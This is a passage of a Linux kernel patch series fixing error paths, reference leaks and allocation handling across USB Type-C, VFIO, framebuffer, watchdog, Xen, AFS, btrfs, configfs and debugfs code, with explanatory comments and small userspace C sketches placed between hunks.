+ 		ret = tps6598x_read16(tps, TPS_REG_POWER_STATUS, &tps->pwr_status);
+ 		if (ret < 0) {
+ 			dev_err(tps->dev, "failed to read power status: %d\n", ret);
+-			goto err_role_put;
++			goto err_unregister_port;
+ 		}
+ 		ret = tps6598x_connect(tps, status);
+ 		if (ret)
+@@ -840,14 +839,16 @@ static int tps6598x_probe(struct i2c_client *client)
+ 					dev_name(&client->dev), tps);
+ 	if (ret) {
+ 		tps6598x_disconnect(tps, 0);
+-		typec_unregister_port(tps->port);
+-		goto err_role_put;
++		goto err_unregister_port;
+ 	}
+ 
+ 	i2c_set_clientdata(client, tps);
++	fwnode_handle_put(fwnode);
+ 
+ 	return 0;
+ 
++err_unregister_port:
++	typec_unregister_port(tps->port);
+ err_role_put:
+ 	usb_role_switch_put(tps->role_sw);
+ err_fwnode_put:
+diff --git a/drivers/usb/typec/wusb3801.c b/drivers/usb/typec/wusb3801.c
+index 3cc7a15ecbd31..a43a18d4b02ed 100644
+--- a/drivers/usb/typec/wusb3801.c
++++ b/drivers/usb/typec/wusb3801.c
+@@ -364,7 +364,7 @@ static int wusb3801_probe(struct i2c_client *client)
+ 	/* Initialize the hardware with the devicetree settings. */
+ 	ret = wusb3801_hw_init(wusb3801);
+ 	if (ret)
+-		return ret;
++		goto err_put_connector;
+ 
+ 	wusb3801->cap.revision		= USB_TYPEC_REV_1_2;
+ 	wusb3801->cap.accessory[0]	= TYPEC_ACCESSORY_AUDIO;
+diff --git a/drivers/vfio/iova_bitmap.c b/drivers/vfio/iova_bitmap.c
+index 6631e8befe1b2..0f19d502f351b 100644
+--- a/drivers/vfio/iova_bitmap.c
++++ b/drivers/vfio/iova_bitmap.c
+@@ -295,11 +295,13 @@ void iova_bitmap_free(struct iova_bitmap *bitmap)
+  */
+ static unsigned long iova_bitmap_mapped_remaining(struct iova_bitmap *bitmap)
+ {
+-	unsigned long remaining;
++	unsigned long remaining, bytes;
++
++	bytes = (bitmap->mapped.npages << PAGE_SHIFT) - bitmap->mapped.pgoff;
+ 
+ 	remaining = bitmap->mapped_total_index - bitmap->mapped_base_index;
+ 	remaining = min_t(unsigned long, remaining,
+-	      (bitmap->mapped.npages << PAGE_SHIFT) / sizeof(*bitmap->bitmap));
++			  bytes / sizeof(*bitmap->bitmap));
+ 
+ 	return remaining;
+ }
+@@ -394,29 +396,27 @@ int iova_bitmap_for_each(struct iova_bitmap *bitmap, void *opaque,
+  * Set the bits corresponding to the range [iova .. iova+length-1] in
+  * the user bitmap.
+  *
+- * Return: The number of bits set.
+  */
+ void iova_bitmap_set(struct iova_bitmap *bitmap,
+ 		     unsigned long iova, size_t length)
+ {
+ 	struct iova_bitmap_map *mapped = &bitmap->mapped;
+-	unsigned long offset = (iova - mapped->iova) >> mapped->pgshift;
+-	unsigned long nbits = max_t(unsigned long, 1, length >> mapped->pgshift);
+-	unsigned long page_idx = offset / BITS_PER_PAGE;
+-	unsigned long page_offset = mapped->pgoff;
+-	void *kaddr;
+-
+-	offset = offset % BITS_PER_PAGE;
++	unsigned long cur_bit = ((iova - mapped->iova) >>
++			mapped->pgshift) + mapped->pgoff * BITS_PER_BYTE;
++	unsigned long last_bit = (((iova + length - 1) - mapped->iova) >>
++			mapped->pgshift) + mapped->pgoff * BITS_PER_BYTE;
+ 
+ 	do {
+-		unsigned long size = min(BITS_PER_PAGE - offset, nbits);
++		unsigned int page_idx = cur_bit / BITS_PER_PAGE;
++		unsigned int offset = cur_bit % BITS_PER_PAGE;
++		unsigned int nbits = min(BITS_PER_PAGE - offset,
++					 last_bit - cur_bit + 1);
++		void *kaddr;
+ 
+ 		kaddr = kmap_local_page(mapped->pages[page_idx]);
+-		bitmap_set(kaddr + page_offset, offset, size);
++		bitmap_set(kaddr, offset, nbits);
+ 		kunmap_local(kaddr);
+-		page_offset = offset = 0;
+-		nbits -= size;
+-		page_idx++;
+-	} while (nbits > 0);
++		cur_bit += nbits;
++	} while (cur_bit <= last_bit);
+ }
+ EXPORT_SYMBOL_GPL(iova_bitmap_set);
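
The rewritten iova_bitmap_set() folds mapped.pgoff (a byte offset into the first pinned page) into a flat bit index, then walks that index page by page. A minimal userspace sketch of the same arithmetic; set_range() and the constants are illustrative, not the kernel API:

	#include <stdio.h>

	#define PAGE_SIZE     4096UL
	#define BITS_PER_BYTE 8UL
	#define BITS_PER_PAGE (PAGE_SIZE * BITS_PER_BYTE)

	/* Flat bit indices for [iova, iova + length - 1], as in the patch. */
	static void set_range(unsigned long iova_base, unsigned long pgshift,
			      unsigned long pgoff, unsigned long iova,
			      unsigned long length)
	{
		unsigned long cur_bit = ((iova - iova_base) >> pgshift) +
					pgoff * BITS_PER_BYTE;
		unsigned long last_bit = (((iova + length - 1) - iova_base) >>
					pgshift) + pgoff * BITS_PER_BYTE;

		do {
			unsigned long page_idx = cur_bit / BITS_PER_PAGE;
			unsigned long offset = cur_bit % BITS_PER_PAGE;
			unsigned long nbits = BITS_PER_PAGE - offset;

			if (nbits > last_bit - cur_bit + 1)
				nbits = last_bit - cur_bit + 1;
			printf("page %lu: set %lu bits at offset %lu\n",
			       page_idx, nbits, offset);
			cur_bit += nbits;
		} while (cur_bit <= last_bit);
	}

	int main(void)
	{
		/* One bitmap page holds BITS_PER_PAGE bits; a range that
		 * crosses that boundary is split across two kmap windows. */
		set_range(0, 12, 0, (BITS_PER_PAGE - 2) << 12, 4UL << 12);
		return 0;
	}
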
+diff --git a/drivers/vfio/platform/vfio_platform_common.c b/drivers/vfio/platform/vfio_platform_common.c
+index 55dc4f43c31e3..1a0a238ffa354 100644
+--- a/drivers/vfio/platform/vfio_platform_common.c
++++ b/drivers/vfio/platform/vfio_platform_common.c
+@@ -72,12 +72,11 @@ static int vfio_platform_acpi_call_reset(struct vfio_platform_device *vdev,
+ 				  const char **extra_dbg)
+ {
+ #ifdef CONFIG_ACPI
+-	struct acpi_buffer buffer = { ACPI_ALLOCATE_BUFFER, NULL };
+ 	struct device *dev = vdev->device;
+ 	acpi_handle handle = ACPI_HANDLE(dev);
+ 	acpi_status acpi_ret;
+ 
+-	acpi_ret = acpi_evaluate_object(handle, "_RST", NULL, &buffer);
++	acpi_ret = acpi_evaluate_object(handle, "_RST", NULL, NULL);
+ 	if (ACPI_FAILURE(acpi_ret)) {
+ 		if (extra_dbg)
+ 			*extra_dbg = acpi_format_exception(acpi_ret);
+diff --git a/drivers/video/fbdev/Kconfig b/drivers/video/fbdev/Kconfig
+index cfc55273dc5d1..974e862cd20d6 100644
+--- a/drivers/video/fbdev/Kconfig
++++ b/drivers/video/fbdev/Kconfig
+@@ -601,6 +601,7 @@ config FB_TGA
+ config FB_UVESA
+ 	tristate "Userspace VESA VGA graphics support"
+ 	depends on FB && CONNECTOR
++	depends on !UML
+ 	select FB_CFB_FILLRECT
+ 	select FB_CFB_COPYAREA
+ 	select FB_CFB_IMAGEBLIT
+@@ -2217,7 +2218,6 @@ config FB_SSD1307
+ 	select FB_SYS_COPYAREA
+ 	select FB_SYS_IMAGEBLIT
+ 	select FB_DEFERRED_IO
+-	select PWM
+ 	select FB_BACKLIGHT
+ 	help
+ 	  This driver implements support for the Solomon SSD1307
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index c0143d38df83a..14a7d404062c3 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -2450,7 +2450,8 @@ err_out:
+ 
+ 	if (userfont) {
+ 		p->userfont = old_userfont;
+-		REFCOUNT(data)--;
++		if (--REFCOUNT(data) == 0)
++			kfree(data - FONT_EXTRA_WORDS * sizeof(int));
+ 	}
+ 
+ 	vc->vc_font.width = old_width;
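
The fbcon fix frees the font buffer once the dropped reference is the last one. The refcount lives in FONT_EXTRA_WORDS of header ints placed in front of the glyph data, so the free must rewind to the start of the real allocation. A userspace analogue of that layout, with font_alloc()/font_put() as invented names:

	#include <stdlib.h>

	#define FONT_EXTRA_WORDS 4              /* header ints before the data */
	#define REFCOUNT(p) (((int *)(p))[-1])  /* last header word, as in fbcon */

	static void *font_alloc(size_t bytes)
	{
		int *p = calloc(1, FONT_EXTRA_WORDS * sizeof(int) + bytes);

		if (!p)
			return NULL;
		p += FONT_EXTRA_WORDS;          /* callers see only the data */
		REFCOUNT(p) = 1;
		return p;
	}

	static void font_put(void *data)
	{
		if (--REFCOUNT(data) == 0)      /* the fix: free on last ref */
			free((char *)data - FONT_EXTRA_WORDS * sizeof(int));
	}

	int main(void)
	{
		void *font = font_alloc(256);

		if (font)
			font_put(font);         /* last ref: frees the whole block */
		return 0;
	}
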
+diff --git a/drivers/video/fbdev/ep93xx-fb.c b/drivers/video/fbdev/ep93xx-fb.c
+index 2398b3d48fedf..305f1587bd898 100644
+--- a/drivers/video/fbdev/ep93xx-fb.c
++++ b/drivers/video/fbdev/ep93xx-fb.c
+@@ -552,12 +552,14 @@ static int ep93xxfb_probe(struct platform_device *pdev)
+ 
+ 	err = register_framebuffer(info);
+ 	if (err)
+-		goto failed_check;
++		goto failed_framebuffer;
+ 
+ 	dev_info(info->dev, "registered. Mode = %dx%d-%d\n",
+ 		 info->var.xres, info->var.yres, info->var.bits_per_pixel);
+ 	return 0;
+ 
++failed_framebuffer:
++	clk_disable_unprepare(fbi->clk);
+ failed_check:
+ 	if (fbi->mach_info->teardown)
+ 		fbi->mach_info->teardown(pdev);
+diff --git a/drivers/video/fbdev/geode/Kconfig b/drivers/video/fbdev/geode/Kconfig
+index ac9c860592aaf..85bc14b6faf64 100644
+--- a/drivers/video/fbdev/geode/Kconfig
++++ b/drivers/video/fbdev/geode/Kconfig
+@@ -5,6 +5,7 @@
+ config FB_GEODE
+ 	bool "AMD Geode family framebuffer support"
+ 	depends on FB && PCI && (X86_32 || (X86 && COMPILE_TEST))
++	depends on !UML
+ 	help
+ 	  Say 'Y' here to allow you to select framebuffer drivers for
+ 	  the AMD Geode family of processors.
+diff --git a/drivers/video/fbdev/hyperv_fb.c b/drivers/video/fbdev/hyperv_fb.c
+index 072ce07ba9e05..4ff25dfc865d9 100644
+--- a/drivers/video/fbdev/hyperv_fb.c
++++ b/drivers/video/fbdev/hyperv_fb.c
+@@ -780,12 +780,18 @@ static void hvfb_ondemand_refresh_throttle(struct hvfb_par *par,
+ static int hvfb_on_panic(struct notifier_block *nb,
+ 			 unsigned long e, void *p)
+ {
++	struct hv_device *hdev;
+ 	struct hvfb_par *par;
+ 	struct fb_info *info;
+ 
+ 	par = container_of(nb, struct hvfb_par, hvfb_panic_nb);
+-	par->synchronous_fb = true;
+ 	info = par->info;
++	hdev = device_to_hv_device(info->device);
++
++	if (hv_ringbuffer_spinlock_busy(hdev->channel))
++		return NOTIFY_DONE;
++
++	par->synchronous_fb = true;
+ 	if (par->need_docopy)
+ 		hvfb_docopy(par, 0, dio_fb_size);
+ 	synthvid_update(info, 0, 0, INT_MAX, INT_MAX);
+diff --git a/drivers/video/fbdev/pm2fb.c b/drivers/video/fbdev/pm2fb.c
+index 7da715d31a933..7a8609c40ae93 100644
+--- a/drivers/video/fbdev/pm2fb.c
++++ b/drivers/video/fbdev/pm2fb.c
+@@ -1533,8 +1533,10 @@ static int pm2fb_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	}
+ 
+ 	info = framebuffer_alloc(sizeof(struct pm2fb_par), &pdev->dev);
+-	if (!info)
+-		return -ENOMEM;
++	if (!info) {
++		err = -ENOMEM;
++		goto err_exit_disable;
++	}
+ 	default_par = info->par;
+ 
+ 	switch (pdev->device) {
+@@ -1715,6 +1717,8 @@ static int pm2fb_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	release_mem_region(pm2fb_fix.mmio_start, pm2fb_fix.mmio_len);
+  err_exit_neither:
+ 	framebuffer_release(info);
++ err_exit_disable:
++	pci_disable_device(pdev);
+ 	return retval;
+ }
+ 
+@@ -1739,6 +1743,7 @@ static void pm2fb_remove(struct pci_dev *pdev)
+ 	fb_dealloc_cmap(&info->cmap);
+ 	kfree(info->pixmap.addr);
+ 	framebuffer_release(info);
++	pci_disable_device(pdev);
+ }
+ 
+ static const struct pci_device_id pm2fb_id_table[] = {
+diff --git a/drivers/video/fbdev/uvesafb.c b/drivers/video/fbdev/uvesafb.c
+index 00d789b6c0faf..0e3cabbec4b40 100644
+--- a/drivers/video/fbdev/uvesafb.c
++++ b/drivers/video/fbdev/uvesafb.c
+@@ -1758,6 +1758,7 @@ static int uvesafb_probe(struct platform_device *dev)
+ out_unmap:
+ 	iounmap(info->screen_base);
+ out_mem:
++	arch_phys_wc_del(par->mtrr_handle);
+ 	release_mem_region(info->fix.smem_start, info->fix.smem_len);
+ out_reg:
+ 	release_region(0x3c0, 32);
+diff --git a/drivers/video/fbdev/vermilion/vermilion.c b/drivers/video/fbdev/vermilion/vermilion.c
+index 82b36dbb5b1a9..33051e3a2561e 100644
+--- a/drivers/video/fbdev/vermilion/vermilion.c
++++ b/drivers/video/fbdev/vermilion/vermilion.c
+@@ -278,8 +278,10 @@ static int vmlfb_get_gpu(struct vml_par *par)
+ 
+ 	mutex_unlock(&vml_mutex);
+ 
+-	if (pci_enable_device(par->gpu) < 0)
++	if (pci_enable_device(par->gpu) < 0) {
++		pci_dev_put(par->gpu);
+ 		return -ENODEV;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/video/fbdev/via/via-core.c b/drivers/video/fbdev/via/via-core.c
+index 2ee8fcae08dfb..b8cd04defc5e2 100644
+--- a/drivers/video/fbdev/via/via-core.c
++++ b/drivers/video/fbdev/via/via-core.c
+@@ -730,7 +730,14 @@ static int __init via_core_init(void)
+ 		return ret;
+ 	viafb_i2c_init();
+ 	viafb_gpio_init();
+-	return pci_register_driver(&via_driver);
++	ret = pci_register_driver(&via_driver);
++	if (ret) {
++		viafb_gpio_exit();
++		viafb_i2c_exit();
++		return ret;
++	}
++
++	return 0;
+ }
+ 
+ static void __exit via_core_exit(void)
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 1ea6d2e5b2187..99d6062afe72f 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -800,3 +800,4 @@ MODULE_AUTHOR("Brijesh Singh <brijesh.singh@amd.com>");
+ MODULE_LICENSE("GPL");
+ MODULE_VERSION("1.0.0");
+ MODULE_DESCRIPTION("AMD SEV Guest Driver");
++MODULE_ALIAS("platform:sev-guest");
+diff --git a/drivers/watchdog/iTCO_wdt.c b/drivers/watchdog/iTCO_wdt.c
+index 34693f11385f6..e937b4dd28be7 100644
+--- a/drivers/watchdog/iTCO_wdt.c
++++ b/drivers/watchdog/iTCO_wdt.c
+@@ -423,14 +423,18 @@ static unsigned int iTCO_wdt_get_timeleft(struct watchdog_device *wd_dev)
+ 	return time_left;
+ }
+ 
+-static void iTCO_wdt_set_running(struct iTCO_wdt_private *p)
++/* Returns true if the watchdog was running */
++static bool iTCO_wdt_set_running(struct iTCO_wdt_private *p)
+ {
+ 	u16 val;
+ 
+-	/* Bit 11: TCO Timer Halt -> 0 = The TCO timer is * enabled */
++	/* Bit 11: TCO Timer Halt -> 0 = The TCO timer is enabled */
+ 	val = inw(TCO1_CNT(p));
+-	if (!(val & BIT(11)))
++	if (!(val & BIT(11))) {
+ 		set_bit(WDOG_HW_RUNNING, &p->wddev.status);
++		return true;
++	}
++	return false;
+ }
+ 
+ /*
+@@ -518,9 +522,6 @@ static int iTCO_wdt_probe(struct platform_device *pdev)
+ 		return -ENODEV;	/* Cannot reset NO_REBOOT bit */
+ 	}
+ 
+-	/* Set the NO_REBOOT bit to prevent later reboots, just for sure */
+-	p->update_no_reboot_bit(p->no_reboot_priv, true);
+-
+ 	if (turn_SMI_watchdog_clear_off >= p->iTCO_version) {
+ 		/*
+ 		 * Bit 13: TCO_EN -> 0
+@@ -572,7 +573,13 @@ static int iTCO_wdt_probe(struct platform_device *pdev)
+ 	watchdog_set_drvdata(&p->wddev, p);
+ 	platform_set_drvdata(pdev, p);
+ 
+-	iTCO_wdt_set_running(p);
++	if (!iTCO_wdt_set_running(p)) {
++		/*
++		 * If the watchdog was not running set NO_REBOOT now to
++		 * prevent later reboots.
++		 */
++		p->update_no_reboot_bit(p->no_reboot_priv, true);
++	}
+ 
+ 	/* Check that the heartbeat value is within its range;
+ 	   if not reset to the default */
+diff --git a/drivers/xen/privcmd.c b/drivers/xen/privcmd.c
+index fae50a24630bd..1edf45ee9890d 100644
+--- a/drivers/xen/privcmd.c
++++ b/drivers/xen/privcmd.c
+@@ -760,7 +760,7 @@ static long privcmd_ioctl_mmap_resource(struct file *file,
+ 		goto out;
+ 	}
+ 
+-	pfns = kcalloc(kdata.num, sizeof(*pfns), GFP_KERNEL);
++	pfns = kcalloc(kdata.num, sizeof(*pfns), GFP_KERNEL | __GFP_NOWARN);
+ 	if (!pfns) {
+ 		rc = -ENOMEM;
+ 		goto out;
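
kdata.num comes straight from the ioctl caller, so an absurd request could previously trigger the page allocator's warning splat; __GFP_NOWARN turns the oversized allocation into a quiet -ENOMEM. A rough userspace analogue of failing quietly on untrusted sizes (alloc_array_quiet() is illustrative):

	#include <errno.h>
	#include <stdint.h>
	#include <stdlib.h>

	/* Like kcalloc() for a caller-supplied count: check the product for
	 * overflow and fail silently, since the count is untrusted input. */
	static void *alloc_array_quiet(size_t num, size_t size)
	{
		if (size && num > SIZE_MAX / size) {
			errno = ENOMEM;
			return NULL;    /* no splat; caller maps this to -ENOMEM */
		}
		return calloc(num, size);
	}

	int main(void)
	{
		/* A huge untrusted count fails quietly instead of warning. */
		void *p = alloc_array_quiet((size_t)-1, 8);

		return p ? 1 : 0;       /* expect NULL, exit 0 */
	}
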
+diff --git a/fs/afs/fs_probe.c b/fs/afs/fs_probe.c
+index 3ac5fcf98d0d6..daaf3810cc925 100644
+--- a/fs/afs/fs_probe.c
++++ b/fs/afs/fs_probe.c
+@@ -366,12 +366,15 @@ void afs_fs_probe_dispatcher(struct work_struct *work)
+ 	unsigned long nowj, timer_at, poll_at;
+ 	bool first_pass = true, set_timer = false;
+ 
+-	if (!net->live)
++	if (!net->live) {
++		afs_dec_servers_outstanding(net);
+ 		return;
++	}
+ 
+ 	_enter("");
+ 
+ 	if (list_empty(&net->fs_probe_fast) && list_empty(&net->fs_probe_slow)) {
++		afs_dec_servers_outstanding(net);
+ 		_leave(" [none]");
+ 		return;
+ 	}
+diff --git a/fs/binfmt_misc.c b/fs/binfmt_misc.c
+index e1eae7ea823ae..bb202ad369d53 100644
+--- a/fs/binfmt_misc.c
++++ b/fs/binfmt_misc.c
+@@ -44,10 +44,10 @@ static LIST_HEAD(entries);
+ static int enabled = 1;
+ 
+ enum {Enabled, Magic};
+-#define MISC_FMT_PRESERVE_ARGV0 (1 << 31)
+-#define MISC_FMT_OPEN_BINARY (1 << 30)
+-#define MISC_FMT_CREDENTIALS (1 << 29)
+-#define MISC_FMT_OPEN_FILE (1 << 28)
++#define MISC_FMT_PRESERVE_ARGV0 (1UL << 31)
++#define MISC_FMT_OPEN_BINARY (1UL << 30)
++#define MISC_FMT_CREDENTIALS (1UL << 29)
++#define MISC_FMT_OPEN_FILE (1UL << 28)
+ 
+ typedef struct {
+ 	struct list_head list;
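
With a 32-bit int, 1 << 31 shifts into the sign bit, which is undefined behavior and in practice yields a negative constant; 1UL << 31 is well defined. A quick demonstration:

	#include <stdio.h>

	int main(void)
	{
		/* Undefined for 32-bit int: the shift reaches the sign bit. */
		long long bad = 1 << 31;        /* typically sign-extends */
		/* Well-defined: the constant is unsigned long before shifting. */
		unsigned long good = 1UL << 31;

		printf("1 << 31   -> %lld\n", bad);   /* commonly -2147483648 */
		printf("1UL << 31 -> %lu\n", good);   /* 2147483648 */
		return 0;
	}
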
+diff --git a/fs/btrfs/extent-io-tree.c b/fs/btrfs/extent-io-tree.c
+index 83cb0378096f2..3676580c2d97e 100644
+--- a/fs/btrfs/extent-io-tree.c
++++ b/fs/btrfs/extent-io-tree.c
+@@ -572,7 +572,7 @@ int __clear_extent_bit(struct extent_io_tree *tree, u64 start, u64 end,
+ 	if (bits & (EXTENT_LOCKED | EXTENT_BOUNDARY))
+ 		clear = 1;
+ again:
+-	if (!prealloc && gfpflags_allow_blocking(mask)) {
++	if (!prealloc) {
+ 		/*
+ 		 * Don't care for allocation failure here because we might end
+ 		 * up not needing the pre-allocated extent state at all, which
+@@ -636,7 +636,8 @@ hit_next:
+ 
+ 	if (state->start < start) {
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 		err = split_state(tree, state, prealloc, start);
+ 		if (err)
+ 			extent_io_tree_panic(tree, err);
+@@ -657,7 +658,8 @@ hit_next:
+ 	 */
+ 	if (state->start <= end && state->end > end) {
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 		err = split_state(tree, state, prealloc, end + 1);
+ 		if (err)
+ 			extent_io_tree_panic(tree, err);
+@@ -966,7 +968,7 @@ static int __set_extent_bit(struct extent_io_tree *tree, u64 start, u64 end,
+ 	else
+ 		ASSERT(failed_start == NULL);
+ again:
+-	if (!prealloc && gfpflags_allow_blocking(mask)) {
++	if (!prealloc) {
+ 		/*
+ 		 * Don't care for allocation failure here because we might end
+ 		 * up not needing the pre-allocated extent state at all, which
+@@ -991,7 +993,8 @@ again:
+ 	state = tree_search_for_insert(tree, start, &p, &parent);
+ 	if (!state) {
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 		prealloc->start = start;
+ 		prealloc->end = end;
+ 		insert_state_fast(tree, prealloc, p, parent, bits, changeset);
+@@ -1062,7 +1065,8 @@ hit_next:
+ 		}
+ 
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 		err = split_state(tree, state, prealloc, start);
+ 		if (err)
+ 			extent_io_tree_panic(tree, err);
+@@ -1099,7 +1103,8 @@ hit_next:
+ 			this_end = last_start - 1;
+ 
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 
+ 		/*
+ 		 * Avoid to free 'prealloc' if it can be merged with the later
+@@ -1130,7 +1135,8 @@ hit_next:
+ 		}
+ 
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 		err = split_state(tree, state, prealloc, end + 1);
+ 		if (err)
+ 			extent_io_tree_panic(tree, err);
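
Each BUG_ON(!prealloc) becomes a jump back to search_again, where the now-unconditional !prealloc branch refills the preallocation with a blocking call, so an atomic allocation failure is retried instead of crashing the machine. The retry shape, loosely sketched (not the actual btrfs walk):

	#include <stdlib.h>

	struct state { int dummy; };

	/* Stand-in for alloc_extent_state_atomic(): a non-blocking attempt. */
	static struct state *alloc_atomic(void)
	{
		return malloc(sizeof(struct state));
	}

	static int set_bits(int splits_needed)
	{
		struct state *prealloc = NULL;

	search_again:
		if (!prealloc)
			prealloc = malloc(sizeof(*prealloc)); /* blocking is OK here */

		while (splits_needed > 0) {
			free(prealloc);                 /* this split consumed it */
			prealloc = NULL;
			splits_needed--;
			prealloc = alloc_atomic();
			if (!prealloc)
				goto search_again;      /* was: BUG_ON(!prealloc) */
		}

		free(prealloc);
		return 0;
	}

	int main(void)
	{
		return set_bits(3);
	}
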
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index d01631d478067..ed4e1c3705d0a 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -696,7 +696,10 @@ next_slot:
+ 						args->start - extent_offset,
+ 						0, false);
+ 				ret = btrfs_inc_extent_ref(trans, &ref);
+-				BUG_ON(ret); /* -ENOMEM */
++				if (ret) {
++					btrfs_abort_transaction(trans, ret);
++					break;
++				}
+ 			}
+ 			key.offset = args->start;
+ 		}
+@@ -783,7 +786,10 @@ delete_extent_item:
+ 						key.offset - extent_offset, 0,
+ 						false);
+ 				ret = btrfs_free_extent(trans, &ref);
+-				BUG_ON(ret); /* -ENOMEM */
++				if (ret) {
++					btrfs_abort_transaction(trans, ret);
++					break;
++				}
+ 				args->bytes_found += extent_end - key.offset;
+ 			}
+ 
+diff --git a/fs/char_dev.c b/fs/char_dev.c
+index ba0ded7842a77..3f667292608c0 100644
+--- a/fs/char_dev.c
++++ b/fs/char_dev.c
+@@ -547,7 +547,7 @@ int cdev_device_add(struct cdev *cdev, struct device *dev)
+ 	}
+ 
+ 	rc = device_add(dev);
+-	if (rc)
++	if (rc && dev->devt)
+ 		cdev_del(cdev);
+ 
+ 	return rc;
+diff --git a/fs/cifs/smb2file.c b/fs/cifs/smb2file.c
+index ffbd9a99fc128..ba6cc50af390f 100644
+--- a/fs/cifs/smb2file.c
++++ b/fs/cifs/smb2file.c
+@@ -122,8 +122,8 @@ int smb2_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32
+ 		struct smb2_hdr *hdr = err_iov.iov_base;
+ 
+ 		if (unlikely(!err_iov.iov_base || err_buftype == CIFS_NO_BUFFER))
+-			rc = -ENOMEM;
+-		else if (hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
++			goto out;
++		if (hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
+ 			rc = smb2_parse_symlink_response(oparms->cifs_sb, &err_iov,
+ 							 &data->symlink_target);
+ 			if (!rc) {
+diff --git a/fs/configfs/dir.c b/fs/configfs/dir.c
+index d1f9d26322027..ec6519e1ca3bf 100644
+--- a/fs/configfs/dir.c
++++ b/fs/configfs/dir.c
+@@ -316,6 +316,7 @@ static int configfs_create_dir(struct config_item *item, struct dentry *dentry,
+ 	return 0;
+ 
+ out_remove:
++	configfs_put(dentry->d_fsdata);
+ 	configfs_remove_dirent(dentry);
+ 	return PTR_ERR(inode);
+ }
+@@ -382,6 +383,7 @@ int configfs_create_link(struct configfs_dirent *target, struct dentry *parent,
+ 	return 0;
+ 
+ out_remove:
++	configfs_put(dentry->d_fsdata);
+ 	configfs_remove_dirent(dentry);
+ 	return PTR_ERR(inode);
+ }
+diff --git a/fs/debugfs/file.c b/fs/debugfs/file.c
+index ddb3fc258df94..b54f470e0d031 100644
+--- a/fs/debugfs/file.c
++++ b/fs/debugfs/file.c
+@@ -378,8 +378,8 @@ ssize_t debugfs_attr_read(struct file *file, char __user *buf,
+ }
+ EXPORT_SYMBOL_GPL(debugfs_attr_read);
+ 
+-ssize_t debugfs_attr_write(struct file *file, const char __user *buf,
+-			 size_t len, loff_t *ppos)
++static ssize_t debugfs_attr_write_xsigned(struct file *file, const char __user *buf,
++			 size_t len, loff_t *ppos, bool is_signed)
+ {
+ 	struct dentry *dentry = F_DENTRY(file);
+ 	ssize_t ret;
+@@ -387,12 +387,28 @@ ssize_t debugfs_attr_write(struct file *file, const char __user *buf,
+ 	ret = debugfs_file_get(dentry);
+ 	if (unlikely(ret))
+ 		return ret;
+-	ret = simple_attr_write(file, buf, len, ppos);
++	if (is_signed)
++		ret = simple_attr_write_signed(file, buf, len, ppos);
++	else
++		ret = simple_attr_write(file, buf, len, ppos);
+ 	debugfs_file_put(dentry);
+ 	return ret;
+ }
++
++ssize_t debugfs_attr_write(struct file *file, const char __user *buf,
++			 size_t len, loff_t *ppos)
++{
++	return debugfs_attr_write_xsigned(file, buf, len, ppos, false);
++}
+ EXPORT_SYMBOL_GPL(debugfs_attr_write);
+ 
++ssize_t debugfs_attr_write_signed(struct file *file, const char __user *buf,
++			 size_t len, loff_t *ppos)
++{
++	return debugfs_attr_write_xsigned(file, buf, len, ppos, true);
++}
++EXPORT_SYMBOL_GPL(debugfs_attr_write_signed);
++
+ static struct dentry *debugfs_create_mode_unsafe(const char *name, umode_t mode,
+ 					struct dentry *parent, void *value,
+ 					const struct file_operations *fops,
+@@ -738,11 +754,11 @@ static int debugfs_atomic_t_get(void *data, u64 *val)
+ 	*val = atomic_read((atomic_t *)data);
+ 	return 0;
+ }
+-DEFINE_DEBUGFS_ATTRIBUTE(fops_atomic_t, debugfs_atomic_t_get,
++DEFINE_DEBUGFS_ATTRIBUTE_SIGNED(fops_atomic_t, debugfs_atomic_t_get,
+ 			debugfs_atomic_t_set, "%lld\n");
+-DEFINE_DEBUGFS_ATTRIBUTE(fops_atomic_t_ro, debugfs_atomic_t_get, NULL,
++DEFINE_DEBUGFS_ATTRIBUTE_SIGNED(fops_atomic_t_ro, debugfs_atomic_t_get, NULL,
+ 			"%lld\n");
+-DEFINE_DEBUGFS_ATTRIBUTE(fops_atomic_t_wo, NULL, debugfs_atomic_t_set,
++DEFINE_DEBUGFS_ATTRIBUTE_SIGNED(fops_atomic_t_wo, NULL, debugfs_atomic_t_set,
+ 			"%lld\n");
+ 
+ /**
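
The signed/unsigned split matters because kstrtoull() rejects a leading minus sign, so writing "-1" to an atomic_t attribute used to fail; routing through the signed parser accepts it. A userspace sketch of the distinction (parse_val() is invented and mimics kstrtoull()'s strictness, which plain strtoull() lacks):

	#include <stdio.h>
	#include <stdlib.h>

	/* The unsigned path rejects a leading '-', the signed path accepts
	 * it, mirroring kstrtoull() vs kstrtoll(). */
	static int parse_val(const char *buf, int is_signed, long long *out)
	{
		char *end;

		if (!is_signed && buf[0] == '-')
			return -1;      /* kstrtoull() would return -EINVAL */
		*out = strtoll(buf, &end, 0);
		return (*end == '\0' || *end == '\n') ? 0 : -1;
	}

	int main(void)
	{
		long long v;

		printf("unsigned \"-1\": %d\n", parse_val("-1", 0, &v)); /* -1 */
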